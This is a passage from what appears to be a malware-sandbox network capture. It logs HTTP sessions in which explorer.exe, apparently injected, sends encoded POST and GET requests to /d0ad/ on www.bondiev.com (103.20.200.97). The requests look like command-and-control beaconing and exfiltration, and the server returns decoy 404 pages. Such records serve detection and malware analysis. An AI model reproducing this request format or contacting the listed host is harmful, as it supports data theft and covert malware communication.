76 50 42 54 51 59 31 4b 6c 64 72 38 6b 4b 75 46 37 35 6b 38 4c 34 6b 39 4a 31 39 65 65 37 58 6c 4b 63 6a 56 6b 42 56 6c 44 34 4d 37 34 72 7a 54 5a 6f 36 62 43 44 62 64 34 4f 50 4a 7a 64 38 59 5a 31 36 42 69 66 48 6f 37 4a 66 37 67 63 34 54 7e 6c 6b 6c 52 4b 49 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=binxmIkcuJsBmXS6Guh6RUdOJXIhM4o4PQ49Quei8LyEOK8xUQHDen28aAnBKIYZwZPhhiHgwz7gSKSzp75JirprfYvPBTQY1Kldr8kKuF75k8L4k9J19ee7XlKcjVkBVlD4M74rzTZo6bCDbd4OPJzd8YZ16BifHo7Jf7gc4T~lklRKIQ).
Oct 26, 2022 13:16:51.582513094 CEST	625	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:16:51 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.11.20	49867	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:53.645085096 CEST	626	OUT	POST /d0ad/ HTTP/1.1 Host: www.bondiev.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.bondiev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bondiev.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 62 69 6e 78 6d 49 6b 63 75 4a 73 42 70 57 43 36 42 50 68 36 57 30 64 42 46 33 49 68 46 59 6f 30 50 51 30 39 51 73 79 79 28 35 57 45 4f 71 4d 78 56 52 48 44 66 6e 32 38 53 67 6e 4f 4f 49 5a 62 77 5a 4c 44 68 67 54 67 77 7a 48 67 54 39 53 7a 6f 4c 35 4f 36 37 70 6f 58 34 76 4f 51 6a 51 4f 31 4b 70 42 72 39 77 4b 75 31 6e 35 6a 2d 54 34 7a 34 70 79 33 75 65 39 52 6c 4b 66 74 46 6b 31 56 6c 4f 48 4d 2d 4d 37 7a 67 46 6f 37 37 69 44 61 64 34 4e 59 4a 7a 47 7e 59 59 2d 71 78 4b 50 4b 4c 50 48 42 5a 55 41 31 52 79 7a 6c 78 4d 76 58 53 44 31 4e 49 43 73 42 44 7a 30 33 4c 4e 6a 59 55 58 43 4b 61 49 61 79 43 56 36 52 49 51 66 36 6d 68 38 74 48 50 37 6f 70 6d 50 64 39 70 77 4d 61 73 31 43 62 6c 36 74 38 43 64 4f 71 56 30 78 50 43 54 56 53 49 4e 42 48 71 53 7a 42 49 54 77 56 34 58 6f 57 65 72 73 56 58 44 31 64 57 6d 54 51 32 72 6e 54 63 79 42 47 45 2d 58 64 6f 42 62 72 6a 37 32 72 73 2d 5a 69 35 6c 51 4f 74 4d 6b 4c 32 59 52 62 35 49 31 6b 35 32 78 63 34 30 76 79 5a 4d 7a 2d 66 64 6b 78 55 5a 75 43 61 55 6a 7a 7e 70 75 4d 35 32 68 4e 41 4c 47 46 28 76 55 2d 56 78 65 39 46 76 30 6b 59 67 6f 51 4e 7a 56 5f 7e 67 38 36 61 41 34 43 34 37 58 53 5a 49 7e 6e 71 48 66 42 38 34 71 78 4b 31 50 53 53 56 4c 63 35 4d 37 2d 41 6e 34 76 77 55 6f 4d 52 2d 6a 50 58 58 79 37 6a 54 6f 74 51 34 56 6e 70 37 48 4e 68 37 6e 77 6c 36 50 46 59 42 61 4e 38 78 4b 56 73 52 41 7a 4e 32 76 64 4e 42 55 46 4d 46 4f 39 53 7a 33 49 35 4e 31 77 63 59 69 47 4a 47 76 48 48 38 63 48 4a 45 50 75 68 48 46 31 62 53 46 30 75 32 64 79 68 71 38 32 35 37 61 44 6f 50 78 68 73 7a 64 77 67 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=binxmIkcuJsBpWC6BPh6W0dBF3IhFYo0PQ09Qsyy(5WEOqMxVRHDfn28SgnOOIZbwZLDhgTgwzHgT9SzoL5O67poX4vOQjQO1KpBr9wKu1n5j-T4z4py3ue9RlKftFk1VlOHM-M7zgFo77iDad4NYJzG~YY-qxKPKLPHBZUA1RyzlxMvXSD1NICsBDz03LNjYUXCKaIayCV6RIQf6mh8tHP7opmPd9pwMas1Cbl6t8CdOqV0xPCTVSINBHqSzBITwV4XoWersVXD1dWmTQ2rnTcyBGE-XdoBbrj72rs-Zi5lQOtMkL2YRb5I1k52xc40vyZMz-fdkxUZuCaUjz~puM52hNALGF(vU-Vxe9Fv0kYgoQNzV_~g86aA4C47XSZI~nqHfB84qxK1PSSVLc5M7-An4vwUoMR-jPXXy7jTotQ4Vnp7HNh7nwl6PFYBaN8xKVsRAzN2vdNBUFMFO9Sz3I5N1wcYiGJGvHH8cHJEPuhHF1bSF0u2dyhq8257aDoPxhszdwg.
Oct 26, 2022 13:16:54.007805109 CEST	626	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:16:53 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.11.20	49868	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:55.979187012 CEST	639	OUT	POST /d0ad/ HTTP/1.1 Host: www.bondiev.com Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.bondiev.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bondiev.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 62 69 6e 78 6d 49 6b 63 75 4a 73 42 70 57 43 36 42 50 68 36 57 30 64 42 46 33 49 68 46 59 6f 30 50 51 30 39 51 73 79 79 28 35 65 45 4f 5a 45 78 55 32 62 44 63 6e 32 38 59 41 6e 65 4f 49 5a 61 77 5a 7a 48 68 67 75 58 77 32 4c 67 54 72 43 7a 72 39 74 4f 28 37 70 70 4c 6f 76 4d 42 54 51 38 31 4b 6c 72 72 39 6b 38 75 46 54 35 6b 35 76 34 6c 65 68 31 78 4f 65 37 52 6c 4b 74 67 6c 6b 39 56 6c 4c 61 4d 2d 49 37 7a 6a 78 6f 36 4a 61 44 63 4f 51 4e 66 5a 7a 5a 30 34 59 68 28 42 4c 6d 4b 49 79 77 42 5a 55 2d 31 51 32 7a 6c 32 51 76 57 52 72 36 4e 6f 43 73 66 7a 7a 33 7a 4c 41 6b 59 55 62 52 4b 61 73 61 79 43 39 36 65 49 51 66 7e 31 35 5f 35 33 50 39 69 4a 6d 69 4f 74 6b 39 4d 61 52 47 43 65 64 36 74 4d 47 64 50 62 56 30 7a 75 43 54 4a 69 49 50 46 48 71 37 70 78 49 66 77 56 70 38 6f 57 7e 56 73 56 7a 44 32 5f 65 6d 58 46 61 73 67 7a 63 4f 66 32 46 30 54 64 73 4e 62 72 79 67 32 72 73 49 5a 6e 5a 6c 51 65 64 4d 6c 4b 32 5a 42 62 35 4c 38 45 34 79 6b 73 30 49 76 79 56 55 7a 5f 6d 59 6b 79 34 5a 73 69 61 55 6d 51 57 75 6b 38 35 78 7e 39 41 5a 49 6c 28 38 55 2d 5a 4c 65 34 39 52 30 56 30 67 75 6b 70 7a 53 76 7e 68 36 61 61 45 79 69 34 68 54 53 5a 49 7e 6e 6d 35 66 42 67 34 28 54 4b 31 41 41 4b 56 41 72 74 4d 39 2d 41 6c 34 76 78 4d 6f 4d 64 37 6a 50 66 39 79 2d 72 35 6f 75 38 34 56 7a 4e 37 41 49 64 6b 6a 41 6c 31 65 31 59 4e 48 64 35 7a 4b 56 67 4a 41 33 73 44 76 76 4a 42 56 47 6b 46 64 74 53 77 38 49 35 4b 32 77 63 4f 7a 57 46 61 76 48 61 4a 63 47 74 55 50 75 5a 48 47 78 4f 34 65 46 47 50 4b 78 46 37 28 54 45 74 45 52 73 31 71 42 41 78 66 6b 55 73 6f 4d 57 6e 50 34 53 5f 56 53 77 4a 33 46 63 44 33 7a 65 33 4c 56 4c 66 30 68 63 68 4b 76 39 4e 58 58 33 59 37 4f 6c 73 38 6e 73 46 68 71 51 6f 72 5f 4e 6c 4b 65 47 57 43 70 4e 67 37 48 65 30 49 72 4d 73 38 56 37 6d 34 62 32 4b 64 6c 64 4d 56 32 68 30 6c 77 35 62 4c 30 51 6b 39 47 71 44 59 64 30 4d 78 61 59 72 6d 46 44 6c 72 53 55 77 69 5a 4e 49 7a 34 53 35 4b 30 28 51 30 57 69 67 51 57 79 64 56 36 30 33 65 70 6d 34 57 6c 28 72 67 68 37 57 37 65 6b 68 30 48 54 41 67 31 77 78 38 42 5a 34 4b 77 6d 72 46 4c 45 72 62 4b 4d 78 68 4b 44 67 41 66 75 45 48 61 64 6d 79 68 53 58 6d 61 77 6c 50 75 74 66 42 4e 30 71 6c 59 6d 2d 49 6b 76 73 70 7a 58 4b 41 45 55 41 74 67 4d 56 43 77 5a 62 32 6a 56 6e 68 56 30 6b 68 46 6b 51 78 52 57 51 55 6f 39 6e 58 6f 76 48 74 32 41 6b 58 33 36 79 50 34 41 50 76 6e 73 6e 32 35 5a 7a 64 67 4e 4f 4d 74 6f 6d 4f 43 4e 42 74 33 4a 79 48 4b 58 56 4c 35 7e 4f 7e 4f 76 49 6d 70 58 36 49 66 6c 32 53 5a 74 77 58 37 5a 71 47 4a 6f 6a 73 44 79 71 6c 74 58 74 34 7a 77 73 72 73 34 5f 47 74 58 4c 35 56 55 39 59 38 63 6b 63 4d 50 66 45 55 50 72 64 55 52 39 34 31 79 38 31 38 31 53 6a 66 4a 43 75 4b 73 4d 4d 73 33 4e 70 50 6a 64 54 56 6a 6a 32 6a 59 47 78 43 6f 6c 72 5f 31 61 56 4e 65 5f 46 73 46 61 73 57 5a 52 74 36 51 51 6e 62 62 59 30 4a 68 4b 63 64 6f 46 4c 41 6b 73 77 67 51 4a 6d 76 5a 62 73 47 65 76 46 44 57 51 51 39 75 62 63 61 73 67 77 6f 35 34 54 66 35 67 75 65 66 48 44 62 73 5f 56 5a 6b 38 6b 57 66 53 64 44 75 42 30 54 46 69 4e 63 58 33 7a 61 4d 38 37 70 52 72 4b 6c 51 33 33 31 61 57 4c 4c 4d 70 64 65 66 64 35 4c 44 77 43 4b 34 77 59 2d 71 4d 69 62 7e 31 67 55 48 6c 7a 45 44 77 77 6b 39 4b 4d 4f 68 32 37 77 66 38 6a 75 6e 35 6a 67 43 59 39 57 4a 74 4e 59 50 76 62 74 64 66 54 6c 4d 6c 51 6d 43 59 4c 52 6b 43 64 6b 67 71 50 5a 6c 41 30 34 4f 77 6a 4a 46 37 63 43 6a 48 59 44 34 38 48 62 28 4c 54 73 6d 73 4a 76 78 6a 6f 71 78 37 44 70 70 5a 76 58 62 2d 38 42 61 59 63 4c 28 56 52 6e 46 4e 68 6d 31 68 74 76 76 54 74 7a 4b 6d 6a 78 67 45 61 38 59 4a 34 6b 59 63 50 4f 69 4f 6d 51 56 5f 76 58 7a 6a 68 71 49 48 68 44 70 30 4e 79 76 54 38 77 58 46 43 47 51 32 67 5a 75 62 76 32 31 73 75 39 71 34 53 5f 34 4e 47 57 4d 5a 6a 73 7e 79 69 44 38 76 56 75 32 75 41 44 4b 47 79 4c 77 5f 56 6b 31 47 72 58 54 37 6c 63 59 38 58 72 72 62 55 75 42 74 56 31 72 65 79 72 4c 4b 66 78 79 51 59 6f 64 6a 63 49 67 4e 42 37 69 57 32 45 78 4d 58 30 53 62 36 7a 68 55 63 45 5a 59 4c 59 76 48 45 58 36 78 6b 64 4a 31 39 4f 77 39 6f 49 48 53 79 53 39 33 31 61 70 47 58 68 4c 79 53 68 44 38 65 72 41 Data Ascii: jXu=binxmIkcuJsBpWC6BPh6W0dBF3IhFYo0PQ09Qsyy(5eEOZExU2bDcn28YAneOIZawZzHhguXw2LgTrCzr9tO(7ppLovMBTQ81Klrr9k8uFT5k5v4leh1xOe7RlKtglk9VlLaM-I7zjxo6JaDcOQNfZzZ04Yh(BLmKIywBZU-1Q2zl2QvWRr6NoCsfzz3zLAkYUbRKasayC96eIQf~15_53P9iJmiOtk9MaRGCed6tMGdPbV0zuCTJiIPFHq7pxIfwVp8oW~VsVzD2_emXFasgzcOf2F0TdsNbryg2rsIZnZlQedMlK2ZBb5L8E4yks0IvyVUz_mYky4ZsiaUmQWuk85x~9AZIl(8U-ZLe49R0V0gukpzSv~h6aaEyi4hTSZI~nm5fBg4(TK1AAKVArtM9-Al4vxMoMd7jPf9y-r5ou84VzN7AIdkjAl1e1YNHd5zKVgJA3sDvvJBVGkFdtSw8I5K2wcOzWFavHaJcGtUPuZHGxO4eFGPKxF7(TEtERs1qBAxfkUsoMWnP4S_VSwJ3FcD3ze3LVLf0hchKv9NXX3Y7Ols8nsFhqQor_NlKeGWCpNg7He0IrMs8V7m4b2KdldMV2h0lw5bL0Qk9GqDYd0MxaYrmFDlrSUwiZNIz4S5K0(Q0WigQWydV603epm4Wl(rgh7W7ekh0HTAg1wx8BZ4KwmrFLErbKMxhKDgAfuEHadmyhSXmawlPutfBN0qlYm-IkvspzXKAEUAtgMVCwZb2jVnhV0khFkQxRWQUo9nXovHt2AkX36yP4APvnsn25ZzdgNOMtomOCNBt3JyHKXVL5~O~OvImpX6Ifl2SZtwX7ZqGJojsDyqltXt4zwsrs4_GtXL5VU9Y8ckcMPfEUPrdUR941y8181SjfJCuKsMMs3NpPjdTVjj2jYGxColr_1aVNe_FsFasWZRt6QQnbbY0JhKcdoFLAkswgQJmvZbsGevFDWQQ9ubcasgwo54Tf5guefHDbs_VZk8kWfSdDuB0TFiNcX3zaM87pRrKlQ331aWLLMpdefd5LDwCK4wY-qMib~1gUHlzEDwwk9KMOh27wf8jun5jgCY9WJtNYPvbtdfTlMlQmCYLRkCdkgqPZlA04OwjJF7cCjHYD48Hb(LTsmsJvxjoqx7DppZvXb-8BaYcL(VRnFNhm1htvvTtzKmjxgEa8YJ4kYcPOiOmQV_vXzjhqIHhDp0NyvT8wXFCGQ2gZubv21su9q4S_4NGWMZjs~yiD8vVu2uADKGyLw_Vk1GrXT7lcY8XrrbUuBtV1reyrLKfxyQYodjcIgNB7iW2ExMX0Sb6zhUcEZYLYvHEX6xkdJ19Ow9oIHSyS931apGXhLyShD8erAK6xnU5ZF4O7gVRww0Fk3BL_JI4zdT0meGN-PkqKG2Za9ZkUyxicvbDnaVADnYKtJ4dUG9iEJ0~ZRDbuKXXhOu21hdnPIF1GaDISVAmUXjESyUu2krX3zMJh1t5RbTt2ymdSF4PCudcDpeGCltO3rAOHqSM0CGNsxpaQeiAEHs5oyzL1MjJNzWnsbqsffYQJG0BC6IJ90yKXOH3BCfJx54n9NaXZHJBjnNqxUt1ZjlzQ6uetf_SyU3fJ8vu-xP4rsNBsgKk7ooXEg1uRyKjOPtNZa_VLgxG8vMuMxUkyDvlOjt(U~RgiEnm1mte5j27_CE4M3-KbDC5ZqWPZvPl4n_Civ4rFls3sAC7H35iapSVzE6nS4VfTltm3MHAo9O8mFUA1F5ynYcdI5ehJlFRAKQbU9PTMrOunKHEbKWVnQCM3OCW6HUbDgzX2xNgsEkJB6wIVjtp26cDFMjlxzGO1wsYRs0C-pPDtdlNn0hYmEKPrq6Y1Hb2q~HorOW5bVaEg6Qk-fEvB1InQqcUC6LgALrQzSVr1a_KFkWfwhO(SUkb09svxudq9UQ1POkr6gYD7(-COsB4XLYUCDeXZBCK9FpNpRBxMVWYzWEaB~Dzl4yJS8XoAqw83Sw9DArcE6BVf9piKnJGSRMEm3osPaaHu~ApT2QulRs5Y6e1zYxGXEtpqH6K185ED7Bqmvs9QbbK2r4lJ0msVATv6PtxMMXWWlPjmjqcuyyv9If~_ZEfw(toNcCJS84yGrpbo0To7VAW3s6D28cjR7SmT(-8FlzsCIoYyVz4uem5NYpre9_Ky(g(E1OoivtB2bfuJ9c11MwHP0IQZFPo8CAJUg_SGOLusjDoTxW2GdiRwTGGaunvt6t(zajhyvf9lyQPhu3(wRhusV6m9LsYCz1ij(Jz6InMDolkQH6hKWOhL6qlAqrEJ1ifhXUNpPDvfPbO7Ni0QI4IE0AvSEtO81vzieZ1KmtkqDzDAaFSQCPQaM6QmvyhX10XiiIj7~fng8aDbXa3s7gIT4ak8iXLEUCfQOiMP3g7SwpYIg8NtCtqjB-t1dcv-lCJGr3ht~ke3F6WRXC5jw6b91ga0xGf12CwofzcPo67XV1cKFs7ZSbcx6UlaIXdzBEmPn-HQjqVTIORcVLljnqcnX-bmlXKBqLiVorS7AdlgxvO9SaDR9VVGaUUo3I7GwKd2~HVNvp2us36V8V5HhHnD5Gl7Qih09yJzFEjcn5IxfA0Mh-l4jdQqbwrSz0USWAOQ71(sr-MOyKqFaD8ettHGfX~Q1cq4JkIreEs00nVSSsfW86Vip75Sz3D-5sfH2wbgNvgn2Fp72qn0saAMtnXt6_a7n7pSx2gZW-XpHiDXCA5lhUEbFnTFKUMwg2Gpr4ZKDXC06tbTBgzbFvvM1tJwMrnRKDPvpeFUcJnMZWyw8b~rMtYCH4iYUZzs0NnJiG4FpfO2e7cfPo(4rYC3j743Sr~3vx6unGRXx6KkwI8-1rD7hRyeMU2_KV46lHgwm5votLe3H_lRfMTopYo1xKgo65RqUo6px1KBHANpM1Nxf_eHHRFhKFVaeQiU6YGozsRtiATJ9IP897Css7uOp9U5VC7vcwoEuZZnSPlWglYx9DsVG0VgcnXMWa97bItLZMvCQ6TEHFo3K5vPVB0lTtzY7uXNujeBt8AIMCg4jlg8j7sKyNrrEoKz7oL4ont_CHbehi1hjhjM0FRoHOvTXFfz6UmPtgdLW1inxYfI~6qYMZ2YVDltetCXCTBFzy7TXmVwXoJoo8IdTZOsqUxUiRgZ9etBiSAT9GZ8rfCsIHP8OVeb2EIUTDe7ChyhukGwEKI2Dpq3HHVySvhN1Z5rXhBhhIaxSoLMeAElTGd8CWSWdN0eXSd1roSsr51qvaC7j-iA6wF7qHQjwiqgIS0stequUs3ugEKBGFrUkecztHi5ATgTZB0khkXyUU(e9rs3dUea5jii59Z77JUJFcNu33HGWuM9oiknSTD77rPjIDRu8mZBNSV6UNl-~W98EmTgMi4R0iWnR3hhnNrdJacFcZSRiBTvqUnP7Pz_eLJJZOmBS31QDLv86w0xYSGCf98BVHKcET6zk0Hwu8MbY_4cA3G2uL~akI41ERTzi6RrXt3156bUo6mlfL6aIveat7ssLx1jZin1GNL777ND3c5wDdIIajl8ieucmD2VJpgnFkhtEoXEWBAaqsfx8b30IyDOEafBJRHLo4ulX17DXs16f0Sc0m0IYBDnL4WyIXYFBN5tqpOyRr9iO00E~AKeVEdwYFBRPQ26S28fqTtCGvxlYVfTMSLS7Oz7Sx9tolBIhxSR2m6LfrH0sXnIUeTYNEuMhnEjwuwTktHFQybAhHPAh2EERXgujwcPxVnibYrA2O~vomNC4xeZpeMcT0LCwTmvLTibe3~8DS~N4YT5RN0zX_hUaauGmL4Soc73XKUIVT4aBX00JYL9BawEyVl75_DJLhPtQ1Oq7NYvP4lNhAMondo5iK502u624tWb7w1vBIwd2KkqT_QkPwwF1ZuqVJp-KD8LJBfCmh3w6XraC1DE7wEUIWWGEMpqu-kLngfNCPsJuNciKikaQha0IxoW8vB_X7QW(ciJHBtgR4Rsbdi3OvjH511fbJHdfX1j28MrewMYviy9QHQZ8iUaFhvEuBdcH2rzuwiZ8fN6y9oVEHW_yam54_VtbOBazzYo85QyMeIF(3gYittQps~pftzT
Oct 26, 2022 13:16:56.294872999 CEST	647	OUT	Data Raw: 59 49 4b 42 4f 59 2d 34 33 51 68 75 6a 52 63 49 6f 69 73 5a 41 53 4d 64 4a 4f 65 47 53 6f 77 6a 53 74 48 6b 6b 67 46 6c 73 37 5f 49 68 41 35 4f 72 75 2d 71 73 37 51 41 66 62 59 4b 57 38 6a 77 35 73 6a 65 76 77 35 42 68 6f 44 38 53 33 46 54 38 56 Data Ascii: YIKBOY-43QhujRcIoisZASMdJOeGSowjStHkkgFls7_IhA5Oru-qs7QAfbYKW8jw5sjevw5BhoD8S3FT8VHOxhNpMPNLsPYjVXalQTI2z0A720EVxMVg8vUfQcn7ltXH_4vaO1Napw0~_VRIrL6h3spCCjutVOd3BqRPBErb3HlMnkhPor1k9~fqo1ngquEg0X9b71IB8lUHEA7zfsPkH8zPPA-ggBzFKPc5vPpwPBifS4z9-za
Oct 26, 2022 13:16:56.294996023 CEST	656	OUT	Data Raw: 58 78 59 79 41 28 58 4a 31 36 45 56 38 77 37 38 36 7a 34 33 36 51 39 77 65 76 61 77 33 51 45 51 61 61 6e 74 64 71 74 70 34 6b 63 35 52 49 30 64 67 6b 75 69 68 61 6d 5a 38 69 47 6b 50 69 72 7a 6c 62 43 45 50 73 70 28 46 56 49 65 78 57 65 71 4f 38 Data Ascii: XxYyA(XJ16EV8w786z436Q9wevaw3QEQaantdqtp4kc5RI0dgkuihamZ8iGkPirzlbCEPsp(FVIexWeqO8n6Z5Dh6CaEyH3CHTeNOLbL9YCHXF5VxNXwbRYYz6cvON3KpEpajTHpd3REY9hi31yPnXLsYKzjOwisE0DP8NCr_HngpDnPmQMxpsRvxPreSV2bQQRTnBh4rOed9eqeACJtS2tagv_3l(f49tWXeFKrLjZaCLDlqyN
Oct 26, 2022 13:16:56.295221090 CEST	665	OUT	Data Raw: 36 66 34 37 50 4e 76 30 59 67 71 79 79 4a 57 6b 47 45 49 46 57 4d 45 31 42 6f 66 55 79 50 55 73 65 38 4e 45 53 5a 31 4b 71 76 73 7e 4c 5a 4b 7e 73 38 32 46 79 70 34 69 58 78 75 4c 5a 4a 34 38 61 6d 6c 61 76 36 51 61 4e 47 59 66 4a 78 6a 39 34 63 Data Ascii: 6f47PNv0YgqyyJWkGEIFWME1BofUyPUse8NESZ1Kqvs~LZK~s82Fyp4iXxuLZJ48amlav6QaNGYfJxj94cIBBH2nzZRFVBUFb32WRKQAQQoCPi2aBgBwvqX4b(MIa4loJCnLG9JKBUf8YG_xnkyMzm8(_~ei5FO4MHyX8Z4(7D-XxEFiVbEp0VLaGYENTsNl-L2frXjy8POnT9V2MtO3tGhuPIu1S69TBR6kt4s70n5ncDWgnzy
Oct 26, 2022 13:16:56.610131979 CEST	667	OUT	Data Raw: 44 5a 69 73 4c 70 35 34 44 48 6d 42 36 5a 4d 4a 4f 46 64 74 71 4d 51 6a 6f 73 53 4c 6b 38 53 6f 50 31 58 68 57 35 4e 62 46 4f 52 77 4f 54 61 43 75 4e 41 53 5f 56 72 30 61 51 65 55 5f 6a 69 5a 36 53 6e 5a 48 6b 4b 77 41 6f 31 74 58 43 35 47 49 67 Data Ascii: DZisLp54DHmB6ZMJOFdtqMQjosSLk8SoP1XhW5NbFORwOTaCuNAS_Vr0aQeU_jiZ6SnZHkKwAo1tXC5GIgFIW6dufrxUZNMjU3toWllg72kgn7cO8KFwGjWDBUo8MszmVZHj-cjzJSwDZzkZ55HUbBGPiRIsniCZMm_jTAKl7AUEUoFI-rXOZYlh7Vyz1i2aiRAVGihCKau~JNQ~IEtl9FNanr3oDQkaaH3FKbDy4E5Tf~5Moj2
Oct 26, 2022 13:16:56.610264063 CEST	678	OUT	Data Raw: 42 72 30 66 44 72 4e 78 64 62 66 77 62 37 63 4d 61 58 73 63 31 70 33 73 7a 4d 4b 79 41 79 32 46 37 6e 6c 51 4b 34 2d 55 34 6e 71 32 6d 58 78 41 31 62 69 35 6b 52 33 38 4c 71 6f 46 36 70 72 57 58 42 79 56 44 6d 52 35 66 79 4e 63 54 28 68 46 6b 66 Data Ascii: Br0fDrNxdbfwb7cMaXsc1p3szMKyAy2F7nlQK4-U4nq2mXxA1bi5kR38LqoF6prWXByVDmR5fyNcT(hFkfDxqkmEnUYdHl8IjEh4WjRt0nyme5AZA9ajV1p7IY1zIZ4mqupwJVAh9Aj~N2n9js-Ej8dXTTSbX7_dR8WgT6ECs0VqGOvOegcwfToxgPSawziWhlaqpJ_GIMmkkJXEsLz9ihs0g1W9U5w~kxoeqnURE97dBlIw3ay
Oct 26, 2022 13:16:56.944330931 CEST	679	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:16:56 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.11.20	49869	103.20.200.97	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:16:58.272543907 CEST	680	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=WgPRl/FvoZMBo2mlKPlxV15+dFE2DaQPOh4rMMuZqba7P4QkcwKBZ2znWxmeG8Vu0cfzpyTmzFPFRI6Qoo1H9rMyaIuGGCESsA== HTTP/1.1 Host: www.bondiev.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
